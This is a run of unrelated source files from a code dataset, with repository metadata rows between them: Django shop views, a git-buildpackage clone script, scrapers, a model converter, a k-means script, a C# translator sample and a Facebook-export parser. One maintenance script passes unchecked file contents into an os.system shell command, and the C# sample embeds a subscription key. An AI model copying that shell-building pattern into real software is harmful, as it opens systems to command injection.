cantidad=int(cantidad)+1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
x=clon
request.session["carritox"]=x
x=request.session["carritox"]
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def carro_compras_menos(request,id):
f=Floreria.objects.get(name=id)
x=request.session["carritox"]
clon=[]
suma=0
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==f.name:
cantidad=int(cantidad)-1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
x=clon
request.session["carritox"]=x
x=request.session["carritox"]
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def galeria(request):
florcita=Floreria.objects.all()
return render(request,'core/galeria.html',{'listaFlores':florcita})
@login_required(login_url='/login/')
def home(request):
return render(request,'core/home.html')
@login_required(login_url='/login/')
def carrito(request):
x=request.session["carritox"]
suma=0
for item in x:
suma=suma+int(item["total"])
return render(request,'core/carrito.html',{'x':x,'total':suma})
@login_required(login_url='/login/')
def formulario(request):
flores=Floreria.objects.all()
if request.POST:
nombre=request.POST.get("InputName")
imagen=request.FILES.get("InputFile")
valor=request.POST.get("InputPrecio")
descripcion=request.POST.get("InputDescripcion")
estado=request.POST.get("InputEstado")
stock=request.POST.get("Inputstock")
flor=Floreria(
name=nombre,
fotografia=imagen,
valor=valor,
descripcion=descripcion,
estado=estado,
stock=stock
)
flor.save()
return render(request,'core/formulario.html',{'listaflores':flores,'msg':'Flor Registrada'})
return render(request,'core/formulario.html',{'listaflores':flores})
def login(request):
if request.POST:
usuario=request.POST.get("txtUsuario")
password=request.POST.get("txtPass")
us=authenticate(request,username=usuario,password=password)
msg=''
request.session["carrito"] = []
request.session["carritox"] = []
print('ingresado')
if us is not None and us.is_active:
login_autent(request,us)
florcita=Floreria.objects.all()
return render(request,'core/home.html',{'listaFlores':florcita})
else:
return render(request,'core/login.html')
return render(request,'core/login.html')
def cerrar_session(request):
logout(request)
return render(request,'core/logout.html')
|
[
"alej.gallardog@alumnos.duoc.cl"
] |
alej.gallardog@alumnos.duoc.cl
|
3cb47fafd4503cb268feb2e6a3ead5817f5a93eb
|
aaf21cc38867fa2d675e16b6788b1d48b1cfa73c
|
/gbp/scripts/clone.py
|
63b1468a064b2117b11bf41ab99bfb0539d5ab0d
|
[] |
no_license
|
teselkin/git-buildpackage
|
ceb44990c0a03a8da3f35c8d296e7207923be049
|
f78de4f006dbf5fea3d6ae4b50901fb003644c6e
|
refs/heads/master
| 2021-01-18T00:20:50.558188
| 2016-11-25T10:20:50
| 2016-11-25T10:25:24
| 55,617,648
| 0
| 0
| null | 2016-04-06T15:26:58
| 2016-04-06T15:26:57
| null |
UTF-8
|
Python
| false
| false
| 6,022
|
py
|
# vim: set fileencoding=utf-8 :
#
# (C) 2009, 2010, 2015 Guido Guenther <agx@sigxcpu.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, please see
# <http://www.gnu.org/licenses/>
#
# inspired by dom-git-checkout
#
"""Clone a Git repository and set it up for gbp"""
import sys
import os
from gbp.config import (GbpOptionParser, GbpOptionGroup)
from gbp.deb.git import DebianGitRepository
from gbp.git import (GitRepository, GitRepositoryError)
from gbp.errors import GbpError
from gbp.scripts.common import ExitCodes
from gbp.scripts.common.hook import Hook
import gbp.log
def build_parser(name):
try:
parser = GbpOptionParser(command=os.path.basename(name), prefix='',
usage='%prog [options] repository - clone a remote repository')
except GbpError as err:
gbp.log.err(err)
return None
branch_group = GbpOptionGroup(parser, "branch options", "branch tracking and layout options")
cmd_group = GbpOptionGroup(parser, "external command options", "how and when to invoke hooks")
parser.add_option_group(branch_group)
parser.add_option_group(cmd_group)
branch_group.add_option("--all", action="store_true", dest="all", default=False,
help="track all branches, not only debian and upstream")
branch_group.add_config_file_option(option_name="upstream-branch", dest="upstream_branch")
branch_group.add_config_file_option(option_name="debian-branch", dest="debian_branch")
branch_group.add_boolean_config_file_option(option_name="pristine-tar", dest="pristine_tar")
branch_group.add_option("--depth", action="store", dest="depth", default=0,
help="git history depth (for creating shallow clones)")
branch_group.add_option("--reference", action="store", dest="reference", default=None,
help="git reference repository (use local copies where possible)")
cmd_group.add_config_file_option(option_name="postclone", dest="postclone",
help="hook to run after cloning the source tree, "
"default is '%(postclone)s'")
cmd_group.add_boolean_config_file_option(option_name="hooks", dest="hooks")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False,
help="verbose command execution")
parser.add_config_file_option(option_name="color", dest="color", type='tristate')
parser.add_config_file_option(option_name="color-scheme",
dest="color_scheme")
return parser
def parse_args(argv):
parser = build_parser(argv[0])
if not parser:
return None, None
(options, args) = parser.parse_args(argv)
gbp.log.setup(options.color, options.verbose, options.color_scheme)
return (options, args)
def main(argv):
retval = 0
(options, args) = parse_args(argv)
if not options:
return ExitCodes.parse_error
if len(args) < 2:
gbp.log.err("Need a repository to clone.")
return 1
else:
source = args[1]
clone_to, auto_name = (os.path.curdir, True) if len(args) < 3 else (args[2], False)
try:
GitRepository(clone_to)
gbp.log.err("Can't run inside a git repository.")
return 1
except GitRepositoryError:
pass
try:
gbp.log.info("Cloning from '%s'%s" % (source, " into '%s'" % clone_to if not auto_name else ''))
repo = DebianGitRepository.clone(clone_to, source, options.depth,
auto_name=auto_name, reference=options.reference)
os.chdir(repo.path)
# Reparse the config files of the cloned repository so we pick up the
# branch information from there but don't overwrite hooks:
postclone = options.postclone
(options, args) = parse_args(argv)
# Track all branches:
if options.all:
remotes = repo.get_remote_branches()
for remote in remotes:
local = remote.replace("origin/", "", 1)
if (not repo.has_branch(local) and
local != "HEAD"):
repo.create_branch(local, remote)
else: # only track gbp's default branches
branches = [options.debian_branch, options.upstream_branch]
if options.pristine_tar:
branches += [repo.pristine_tar_branch]
gbp.log.debug('Will track branches: %s' % branches)
for branch in branches:
remote = 'origin/%s' % branch
if (repo.has_branch(remote, remote=True) and
not repo.has_branch(branch)):
repo.create_branch(branch, remote)
repo.set_branch(options.debian_branch)
if postclone:
Hook('Postclone', options.postclone,
extra_env={'GBP_GIT_DIR': repo.git_dir},
)()
except KeyboardInterrupt:
retval = 1
gbp.log.err("Interrupted. Aborting.")
except GitRepositoryError as err:
gbp.log.err("Git command failed: %s" % err)
retval = 1
except GbpError as err:
if str(err):
gbp.log.err(err)
retval = 1
return retval
if __name__ == '__main__':
sys.exit(main(sys.argv))
# vim:et:ts=4:sw=4:et:sts=4:ai:set list listchars=tab\:»·,trail\:·:
|
[
"agx@sigxcpu.org"
] |
agx@sigxcpu.org
|
e7528b53bf59accca0a8edb3e80b97d34f68dd60
|
b47c9f284c80061fc094568fc095f6daf0cd7d89
|
/soukuanshop/soukuanshop/main.py
|
5213b306e19ae97badfe9f9b24b2c5dc58741ba1
|
[] |
no_license
|
wjsunday/scrapy_test
|
2361c0584ea546cfec0a9d9854fad1c209f8d6b2
|
980e2f8b898de2f76e5cc1754b66a0be90b1b738
|
refs/heads/master
| 2022-11-14T05:43:16.821153
| 2019-03-22T06:38:01
| 2019-03-22T06:38:01
| 170,845,836
| 0
| 1
| null | 2022-11-04T19:26:43
| 2019-02-15T10:20:16
|
Python
|
UTF-8
|
Python
| false
| false
| 86
|
py
|
from scrapy import cmdline
cmdline.execute('scrapy crawl soukuanshop_spider'.split())
|
[
"wangalways@163.com"
] |
wangalways@163.com
|
f98677b8c19e4cc92135f5d82ed7910c4ceaacf0
|
942c67f11656d0da648c7156e7dbe37e9216a723
|
/tools/convert_uff.py
|
0b0dfa741c9af75c6e54c7673e5c783c99b5c47c
|
[
"MIT"
] |
permissive
|
ikonushok/recface
|
62eec353d3eded97fa7748d3f45f1964f0f673bc
|
bada63e1b92783cde1d99501e76a78eb363b225f
|
refs/heads/main
| 2023-08-18T07:02:31.468952
| 2021-09-15T08:06:08
| 2021-09-15T08:06:08
| 460,003,377
| 0
| 1
|
MIT
| 2022-02-16T12:53:36
| 2022-02-16T12:53:36
| null |
UTF-8
|
Python
| false
| false
| 1,100
|
py
|
#!/usr/bin/env python
import sys
import logging
import argparse
logging.disable(logging.WARNING)
# The "uff 0.6.9" module works only with "tensorflow 1.15.0"
UFF_DIR = '/usr/lib/python3.6/dist-packages'
sys.path.append(UFF_DIR)
import uff
logging.disable(logging.NOTSET)
def create_parser():
parser = argparse.ArgumentParser(
description=('Converts a Tensorflow frozen graph model '
'into a TensorRT UFF format'))
parser.add_argument('frz_path', type=str,
help='specify the frozen model path')
parser.add_argument('uff_path', type=str,
help='specify the UFF model path')
return parser
def convert(frz_path, uff_path):
uff.from_tensorflow_frozen_model(
frozen_file=frz_path, output_nodes=["Identity"],
output_filename=uff_path, debug_mode=False)
def main():
parser = create_parser()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
convert(args.frz_path, args.uff_path)
if __name__ == '__main__':
main()
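# Typical invocation (paths are placeholders):
#   python3 convert_uff.py frozen_inference_graph.pb model.uff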
|
[
"rustequal@gmail.com"
] |
rustequal@gmail.com
|
4c549606cc28efd9624f18138428cae291966aaf
|
0d235d1a01f623fc0e0f3a1c634eb38659a0609e
|
/files/check_restore_processes.py
|
1c7aa5af828cbe114b6ebedf5dcd64571a0b8fd0
|
[] |
no_license
|
dCache/dcache-puppet
|
4d3d53539c5adf335bdc19333fccae2770fe8417
|
40fd1bb8298fcfce7593dd02440351a4bb0767d1
|
refs/heads/master
| 2021-01-01T05:46:41.046127
| 2019-06-17T13:55:18
| 2019-06-17T13:55:18
| 41,730,779
| 0
| 2
| null | 2017-09-20T15:08:40
| 2015-09-01T09:54:36
|
Perl
|
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
#!/usr/bin/python
# FILE: /opt/endit/check_restore_processes.py
#
# DESCRIPTION:
#
# VERSION: 06.12.2013
#
# AUTOR: Cristina Manzano
# Juelich Supercomputing Centre (JSC)
# Forschungszentrum Juelich GmbH
# 52425 Juelich, Germany
#
# Phone: +49 2461 61 1958
# E-mail: c.manzano@fz-juelich.de
#
# TO DO:
# -
import os
import logging
# set up logging to file - see previous section for more details
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)-6s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
filename='/tmp/checking.log',
filemode='a')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(asctime)s %(levelname)-6s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
def check_process(pnfsid):
outfile = "/tmp/checking.out"
request = "ps -ef |grep "+pnfsid
logging.info(request)
#os.system("rm -f "+outfile)
os.system(request+" 2>&1 > "+outfile)
input_f = open(outfile, "r")
logging.info(input_f.read())
input_f.close()
return
#MAIN
#input_f = open("/var/log/dcache/files_dC12_CACHED","r")
input_f = open("/var/log/dcache/files_to_delete.24.03.2014","r")
for line in input_f:
words = line.split("\n")
pnfsid = words[0]
check_process(pnfsid)
input_f.close()
|
[
"o.tsigenov@fz-juelich.de"
] |
o.tsigenov@fz-juelich.de
|
e8a6c4a603dd1cbd2f2a7b1cfd2e38ae89096891
|
9ac7f65867bf8654db45c346bdaf67d2bda8580e
|
/Clustering/clustering.py
|
69073c129c7bccddbf017112eb5dfd99774ca17a
|
[] |
no_license
|
rashmi59/AMLCornell
|
ad9e3df1cbdaf4cfc2ed88fca1c6234213504242
|
dcb7782a0fb1877c7782b2267dab276b16d8a77c
|
refs/heads/master
| 2023-02-01T05:03:27.075153
| 2020-12-20T04:31:11
| 2020-12-20T04:31:11
| 302,675,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 1 22:08:17 2020
@author: rashmisinha
"""
import numpy as np
from functools import cmp_to_key
from matplotlib import pylab as plt
import random
doc_word = np.load("science2k-doc-word.npy")
text_file = open("science2k-titles.txt", "r")
titles = text_file.read().split('\n')
word_doc = np.load("science2k-word-doc.npy")
vocab_file = open("science2k-vocab.txt", "r")
words = vocab_file.read().split('\n')
class K_Means:
def __init__(self, k=2, tol=0.001, max_iter=300):
self.k = k
self.tol = tol
self.max_iter = max_iter
# Function to compute k means by assigning centroids,
#computing disatance and reassigning centroids
def fit(self,data):
self.centroids = {}
randlist = random.sample(range(data.shape[0]), self.k)
for i in range(self.k):
self.centroids[i] = data[randlist[i]]
for i in range(self.max_iter):
self.classifications = {}
for i in range(self.k):
self.classifications[i] = []
for featureset in data:
distances = [np.linalg.norm(featureset-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
self.classifications[classification].append(featureset)
prev_centroids = dict(self.centroids)
for classification in self.classifications:
self.centroids[classification] = np.average(self.classifications[classification],axis=0)
optimized = True
for c in self.centroids:
original_centroid = prev_centroids[c]
current_centroid = self.centroids[c]
if np.sum((current_centroid-original_centroid)/original_centroid*100.0) > self.tol:
#print(np.sum((current_centroid-original_centroid)/original_centroid*100.0))
optimized = False
if optimized:
break
# Function to compute error for elbow curve
def geterror(centroid, classification):
error = 0;
for i in range(0, len(classification)):
for j in range(0, len(classification[i])):
error += (centroid[j] - classification[i][j]) * (centroid[j] - classification[i][j])
return error
# Custom compare to sort according to closeness to a point
def cmp(a, b):
suma = 0
for i in range(0, len(a)):
suma += (centr[i] - a[i]) * (centr[i] - a[i])
sumb = 0
for i in range(0, len(b)):
sumb += (centr[i] - b[i]) * (centr[i] - b[i])
if suma < sumb:
return 1
else:
return -1
# Running k means for doc word dataset
finans = {}
errorlist = []
for num in range(1, 21):
clf = K_Means(k = num, max_iter = 1000)
clf.fit(doc_word)
classifications = clf.classifications
centroids = clf.centroids
global centr
doc_word_list = doc_word.tolist()
ans = {}
error = 0
for i in centroids:
error += geterror(centroids[i], classifications[i])
points = classifications[i]
cmp_key = cmp_to_key(cmp)
centr = centroids[i]
points.sort(key=cmp_key)
ans[i] = []
for j in range(0, min(10, len(points))):
for p in range(0, len(doc_word_list)):
if doc_word_list[p] == points[j].tolist():
ans[i].append(titles[p])
break
errorlist.append(error)
finans[num] = ans
plt.figure(0)
plt.plot(list(range(1, 21)), errorlist)
plt.ylabel('error')
plt.xlabel('k values')
plt.title('Error versus k values')
#Running k means for word-doc dataset
finans = {}
errorlist = []
for num in range(1, 21):
clf = K_Means(k = num, max_iter = 1000)
clf.fit(word_doc)
classifications = clf.classifications
centroids = clf.centroids
word_doc_list = word_doc.tolist()
ans = {}
error = 0
for i in centroids:
error += geterror(centroids[i], classifications[i])
points = classifications[i]
cmp_key = cmp_to_key(cmp)
centr = centroids[i]
points.sort(key=cmp_key)
ans[i] = []
for j in range(0, min(10, len(points))):
for p in range(0, len(word_doc_list)):
                if word_doc_list[p] == points[j].tolist():
                    ans[i].append(words[p])
break
errorlist.append(error)
finans[num] = ans
plt.figure(0)
plt.plot(list(range(1, 21)), errorlist)
plt.ylabel('error')
plt.xlabel('k values')
plt.title('Error versus k values')
|
[
"rashmi.s5991@gmail.com"
] |
rashmi.s5991@gmail.com
|
426a44d8dad21cdb891f06f7a97122c8ba62a0b6
|
2bdedcda705f6dcf45a1e9a090377f892bcb58bb
|
/src/main/output/test/aws_people_netflix_job.py
|
2b7ca0507043c6c957363b451686f46eed298080
|
[] |
no_license
|
matkosoric/GenericNameTesting
|
860a22af1098dda9ea9e24a1fc681bb728aa2d69
|
03f4a38229c28bc6d83258e5a84fce4b189d5f00
|
refs/heads/master
| 2021-01-08T22:35:20.022350
| 2020-02-21T11:28:21
| 2020-02-21T11:28:21
| 242,123,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
using System;
using System.Net;
using System.Net.Http;
using System.Threading.Tasks;
using Microsoft.Translator.API;
namespace CSharp_TranslateSample
{
class Program
{
private const string SubscriptionKey = "02fc72d7132657bc795325f80933e657"; //Enter here the Key from your Microsoft Translator Text subscription on http://portal.azure.com
static void Main(string[] args)
{
TranslateAsync().Wait();
Console.ReadKey();
}
/// Demonstrates getting an access token and using the token to translate.
private static async Task TranslateAsync()
{
var translatorService = new TranslatorService.LanguageServiceClient();
var authTokenSource = new AzureAuthToken(SubscriptionKey);
var token = string.Empty;
try
{
token = await authTokenSource.GetAccessTokenAsync();
}
catch (HttpRequestException)
{
switch (authTokenSource.RequestStatusCode)
{
case HttpStatusCode.Unauthorized:
Console.WriteLine("Request to token service is not authorized (401). Check that the Azure subscription key is valid.");
break;
case HttpStatusCode.Forbidden:
Console.WriteLine("Request to token service is not authorized (403). For accounts in the free-tier, check that the account quota is not exceeded.");
break;
}
throw;
}
Console.WriteLine("Translated to French: {0}", translatorService.Translate(token, "Hello World", "en", "fr", "text/plain", "general", string.Empty));
}
}
}
|
[
"soric.matko@gmail.com"
] |
soric.matko@gmail.com
|
bbd421d3102721960d65d39daf5a187b6a76d6a5
|
cfce1431185099032e3d2399cf6ee1d5fc3d153a
|
/pyspark10.py
|
91e60ba06eaed2c14e932605a30981a74d3492a5
|
[] |
no_license
|
mohanvatrapuhub/Spark-Code
|
6315ce7d34c3033d698c809c6d42e482bae576fd
|
a8a1f652f1a33ba40ab38e7d508a960a698f9fe9
|
refs/heads/master
| 2021-01-11T16:23:29.488261
| 2017-01-26T00:57:37
| 2017-01-26T00:57:37
| 80,069,938
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,132
|
py
|
#Finding the average revenue per day using aggregate functions in spark using pyspark
ordersRDD = sc.textFile("/user/cloudera/import/orders")
orderItemsRDD = sc.textFile("/user/cloudera/import/order_items")
ordersParsedRDD = ordersRDD.map(lambda rec: (rec.split(",")[0], rec))
orderItemsParsedRDD = orderItemsRDD.map(lambda rec: (rec.split(",")[1], rec))
ordersJoinOrderItems = orderItemsParsedRDD.join(ordersParsedRDD)
ordersJoinOrderItemsMap = ordersJoinOrderItems.map(lambda t: ((t[1][1].split(",")[1], t[0]), float(t[1][0].split(",")[4])))
revenuePerDayPerOrder = ordersJoinOrderItemsMap.reduceByKey(lambda acc, value: acc + value)
revenuePerDayPerOrderMap = revenuePerDayPerOrder.map(lambda rec: (rec[0][0], rec[1]))
#Performing aggregation by using combineByKey aggregate function
revenuePerDay = revenuePerDayPerOrderMap.combineByKey(
    lambda x: (x, 1),                                             # createCombiner: (revenue, order count) for the first order of a day
    lambda acc, revenue: (acc[0] + revenue, acc[1] + 1),          # mergeValue: fold another order's revenue into the running (sum, count)
    lambda total1, total2: (round(total1[0] + total2[0], 2), total1[1] + total2[1])  # mergeCombiners: combine partial (sum, count) pairs across partitions
)
for data in revenuePerDay.collect():
print(data)
avgRevenuePerDay = revenuePerDay.map(lambda x: (x[0], x[1][0]/x[1][1]))
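# Illustrative follow-up (assumes the same pyspark shell session with `sc` available):
# for day, avg in avgRevenuePerDay.collect():
#     print(day, round(avg, 2))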
|
[
"mohanchaitanya2593@gmail.com"
] |
mohanchaitanya2593@gmail.com
|
e21efb1a670fd9d11859661c10a6e5043a968dad
|
e5f61b78618dcbd25f6789a6f9c2246c9e1fa74a
|
/day_3/todo_list/.todo-list/bin/dotenv
|
4660b0da286e3828f00d3e44eefc7eb8ced6680a
|
[] |
no_license
|
stephenh369/python_course
|
14674a77d543d86babb767089be6c6bed04e75f6
|
39297e3e52e31fb265ff614a368307847f18f653
|
refs/heads/master
| 2023-01-01T07:20:10.505888
| 2020-10-16T09:29:23
| 2020-10-16T09:29:23
| 304,581,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
#!/Users/user/e41/codeclan_work/python_extra_course/day_3/todo_list/.todo-list/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from dotenv.cli import cli
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cli())
|
[
"stephen_h369@live.co.uk"
] |
stephen_h369@live.co.uk
|
|
f5c1516db24cb09cf7068e17be9a3f99b012f220
|
7644d98d292eb9260d295b3298a6110998c7e239
|
/fb_scrap.py
|
0b0f50a4da519b3141810b70b6be5e9998b237ac
|
[] |
no_license
|
SarthakM7/facebookScraper-self-
|
17c6329bff4b9dac9e9c345911f92a82a265795a
|
c7ae0929a9e83c837e56ca63215e0c71be204b86
|
refs/heads/main
| 2023-04-20T16:22:54.069325
| 2021-05-07T23:49:04
| 2021-05-07T23:49:04
| 365,377,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,570
|
py
|
import codecs, os, re
from bs4 import BeautifulSoup
def parse_videos():
"""
Prints the total number of video files inside the /photos_and_videos/videos folder
uploaded directly to Facebook.
"""
videos_dir = '{}/photos_and_videos/videos'.format(fb_dir)
if not os.path.exists(videos_dir):
return
_, __, filenames = next(os.walk(videos_dir))
print('Number of Videos: {}'.format(len(filenames)))
def parse_photos():
"""
Traverses the contents of the /photos_and_videos folder.
Prints the total number of photos/comments, as well as your average
comments per photo and the top 10 most frequent commenters.
The actual photos are separated by album and have their own folders.
There is an HTML file for each album in the /photos_and_videos/album
folder with metadata and the comments.
"""
photos_and_videos_dir = '{}/photos_and_videos'.format(fb_dir)
if not os.path.exists(photos_and_videos_dir):
return
album_dir = photos_and_videos_dir + '/album'
stickers_dir = photos_and_videos_dir + '/stickers_used'
videos_dir = photos_and_videos_dir + '/videos'
photo_count = 0
photo_albums = []
comment_counts = {}
for i, (dirpath, dirnames, filenames) in enumerate(os.walk(photos_and_videos_dir)):
if dirpath == album_dir:
# Retrieve album filenames
photo_albums = filenames
elif i != 0 and dirpath != stickers_dir and dirpath != videos_dir:
# Skip the first iteration to ignore the html files in the
# root photos_and_videos file, along with any stickers in
# /stickers_used and videos in /videos
photo_count += len(filenames)
for filename in photo_albums:
filepath = album_dir + '/{}'.format(filename)
comment_counts = parse_photo_album(filepath, comment_counts)
    total_comment_count = sum(comment_counts.values())
average_comments_per_photo = total_comment_count / float(photo_count)
print('Number of Photos: {}'.format(photo_count))
print('Number of Comments: {}'.format(total_comment_count))
print('Average Comments Per Photo: {}'.format(average_comments_per_photo))
print('Top 10 Commenters:')
print_dict(comment_counts, end_index=10)
def parse_photo_album(filepath, comment_counts):
"""
Traverses the contents of a specific photo album HTML file.
Example comment format:
<div class="comment">
<span class="user">Probably My Mom</span>Love this photo!
<div class="meta">Wednesday, May 17, 2017 at 7:08am UTC+10</div>
</div>
"""
f = codecs.open(filepath, 'r', 'utf-8')
soup = BeautifulSoup(f.read(), 'lxml')
for comment in soup.findAll('div', {'class': 'uiBoxGray'}):
user = comment.findAll('span')[0].text
try:
user = str(user)
comment_counts = increment_dict(comment_counts, user)
except:
# There was a unicode error with the user name
continue
return comment_counts
def parse_friends_list():
"""
Traverses the contents of the friends HTML file.
"""
f = codecs.open('{}/friends/friends.html'.format(fb_dir), 'r', 'utf-8')
soup = BeautifulSoup(f.read(), 'lxml')
friend_map = {}
friends_list = soup.findAll('div', {'class': 'uiBoxWhite'})
for friend in friends_list:
year = get_year(friend.text)
friend_map = increment_dict(friend_map, year)
print('Friends Added By Year:')
print_dict(friend_map)
def parse_timeline():
"""
Traverses the contents of the comments HTML file.
Example comment format:
<div class="pam _3-95 _2pi0 _2lej uiBoxWhite noborder">
<div class="_3-96 _2pio _2lek _2lel">[Your name] commented on [another user's name] 's [post, comment, song, video, or link]</div>
<div class="_3-96 _2let">
<div>
<div class="_2pin">
<div>[Your comment]</div>
</div>
</div>
</div>
<div class="_3-94 _2lem">
<a href=[Live URL]>Jan 16, 2019, 10:15 AM</a>
</div>
</div>
"""
try:
f = codecs.open('{}/posts/your_posts.html'.format(fb_dir), 'r', 'utf-8')
posts_soup = BeautifulSoup(f.read(), 'lxml')
posts_data = posts_soup.findAll('div', {'class': 'uiBoxWhite'})
except:
        posts_soup = []
        posts_data = []
        print('posts/your_posts.html not found')
f = codecs.open('{}/comments/comments.html'.format(fb_dir), 'r', 'utf-8')
comments_soup = BeautifulSoup(f.read(), 'lxml')
comments_data = comments_soup.findAll('div', {'class': 'uiBoxWhite'})
posts = 0
songs = 0
videos = 0
comments = 0
for post in posts_data:
for url in ['https://open.spotify.com/track/', 'https://soundcloud.com/']:
if url in post.text:
songs += 1
for url in ['https://www.youtube.com/', 'https://vimeo.com/']:
if url in post.text:
videos += 1
posts += 1
for comment in comments_data:
comments += 1
metadata_map = {}
for metadata in comments_data:
year = get_year(metadata.text)
metadata_map = increment_dict(metadata_map, year)
for metadata in posts_data:
year = get_year(metadata.text)
metadata_map = increment_dict(metadata_map, year)
print('Number of Posts: {}'.format(posts))
print('Number of Comments: {}'.format(comments))
print('Songs Shared: {}'.format(songs))
print('Videos Shared: {}'.format(videos))
print('Timeline Activity By Year:')
print_dict(metadata_map)
def print_dict(dictionary, sort_index=1, end_index=100000):
"""
Iterate over the dictionary items and print them as a key, value list.
"""
sorted_dict = sorted(dictionary.items(),
key=lambda x: x[sort_index],
reverse=True)
for k, v in sorted_dict[:end_index]:
print(' - {}: {}'.format(k, v))
def increment_dict(dictionary, key):
"""
Given a dict of str keys, increment the int count value.
"""
if key in dictionary:
dictionary[key] += 1
else:
dictionary[key] = 1
return dictionary
def get_year(text):
"""
Given some text, parse out the year.
Example formats:
- May 19, 2007
- Jan 7, 2011, 4:25 PM
"""
match = re.findall(r', [0-9]{4}', text)
return match[0][2:]
fb_dir = find_fb_dir()
parse_videos()
parse_photos()
parse_friends_list()
parse_timeline()
|
[
"noreply@github.com"
] |
SarthakM7.noreply@github.com
|
b7504f8d6a04c2aea9e6087d3e6e0aa4de3ec1d1
|
c4a67e16f9aa1828aa53780f7ad1cb60033dabe3
|
/main.py
|
26f99e9d7f20cbc9bfcbf8635041f2e3fa3fcbc0
|
[
"MIT"
] |
permissive
|
t4t5u0/NarouBookmarkGetter
|
a34af8c28e64bc2e943019b90f0897455f93d6b9
|
08267adff137890cd4796a3f4022c3100c39f991
|
refs/heads/master
| 2023-07-27T17:28:54.109803
| 2021-09-07T20:38:47
| 2021-09-07T20:38:47
| 318,339,949
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,951
|
py
|
import json
import time
from collections import UserDict
from configparser import ConfigParser
import requests
from bs4 import BeautifulSoup
login = 'https://ssl.syosetu.com/login/login/'
top = "https://syosetu.com/"
bookmark = "https://syosetu.com/favnovelmain/list/"
query = "https://syosetu.com/favnovelmain/list/index.php"
config = ConfigParser()
config.read('config.ini')
payload = {"narouid": config['DEFAULT']
['narouid'], "pass": config['DEFAULT']['pass']}
# print(payload)
ua = "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Mobile Safari/537.36"
headers = {"User-Agent": ua}
class SyosetsuInfoDict(UserDict):
"data: これが本体"
def __init__(self, __ncode: str, __title: str, __total) -> None:
super().__init__(ncode=__ncode, title=__title, total=__total)
def get_all_bookmark():
"全てのブックマークを取得する処理"
ncodes = []
titles = []
totals = []
ses = requests.Session()
a = ses.post(login, data=payload, headers=headers)
try:
cookies = [dict(hoge.cookies) for hoge in a.history][0]
except IndexError as e:
print(e)
        print('Please check your narouid and pass settings')
exit(0)
for i in range(1, 11):
tmp = []
        # wait a little between categories, just to be gentle on the server
time.sleep(1)
for j in range(1, 9):
param = {"nowcategory": str(i), "order": "new", "p": str(j)}
page = ses.get(query, headers=headers,
params=param, cookies=cookies)
            # skip unless the status code is 200
if page.status_code != 200:
continue
# title: a class=title text -> list[str]
            # ncode: taken from the href of each <a class="title"> -> list[str]
            # total: search by ncode -> t := a href[-1] -> t[2:-2]
soup = BeautifulSoup(page.text, 'lxml')
contents = soup.find_all('a', class_='title')
query_with_story = [l.get('href') for l in soup.select('p.no > a')]
            # skip if identical to the previous page (no new entries)
if contents == tmp:
continue
tmp = "https://syosetu.com/favnovelmain/list/index.php"
titles += [content.text.replace('\u3000', ' ')
for content in contents]
ncodes += [content.get('href')[26:-2] for content in contents]
totals += [l.split('/')[-2] for l in query_with_story]
return sorted([SyosetsuInfoDict(ncode, title, total).data
for ncode, title, total
in zip(ncodes, titles, totals)],
key=lambda x: x['ncode'])
if __name__ == "__main__":
result = get_all_bookmark()
with open(f'./data/{time.time()}.json', 'a+') as f:
json.dump(result, f, ensure_ascii=False, indent=4)
|
[
"ymmtryk0902@gmail.com"
] |
ymmtryk0902@gmail.com
|
f78a7ddcb5380ac08fb04a0a48d03d31cc027626
|
7d4c778e2ba6d8272baec99705e5691036e778c0
|
/EE-without-Grammar.py
|
2402e204645a1d3f465501ce690be05e420ddfd8
|
[] |
no_license
|
Ganz7/Reggo-Evaluator
|
b34dae7a81ccbd89a68369007a87bbc3dd8be085
|
5412b917d0488ae6183241c3e89a1ca370680906
|
refs/heads/master
| 2021-01-20T11:31:07.254296
| 2014-03-06T13:24:52
| 2014-03-06T13:24:52
| 17,478,272
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,118
|
py
|
'''
Program: Essay Evaluator
'''
import csv
import numpy as np
import matplotlib.pyplot as plt
from nltk import wordpunct_tokenize
from nltk.tag import pos_tag
import re
import enchant
from LSA.LSAClass import LSA
'''For Grammar Checker'''
#Start
#from py4j.java_gateway import JavaGateway
#gateway = JavaGateway()
